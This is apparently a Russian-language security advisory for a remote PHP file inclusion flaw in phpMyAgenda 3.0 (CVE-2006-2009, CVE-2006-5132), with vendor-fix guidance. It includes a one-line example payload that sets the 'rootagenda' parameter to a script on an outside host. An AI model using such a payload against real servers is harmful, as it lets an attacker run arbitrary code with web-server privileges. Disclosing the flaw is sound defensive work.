PHP-инклюдинг в phpMyAgenda

Дата публикации:
26.04.2006
Дата изменения:
24.03.2009
Всего просмотров:
2228
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2009
CVE-2006-5132
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpMyAgenda 3.x
Уязвимые версии: phpMyAgenda 3.0 Final, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "rootagenda" в сценарии agenda.php3. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

rootagenda=http://www.yourspace.com/yourscript.php?

URL производителя: www.phpmyagenda.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: [MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability

или введите имя

CAPTCHA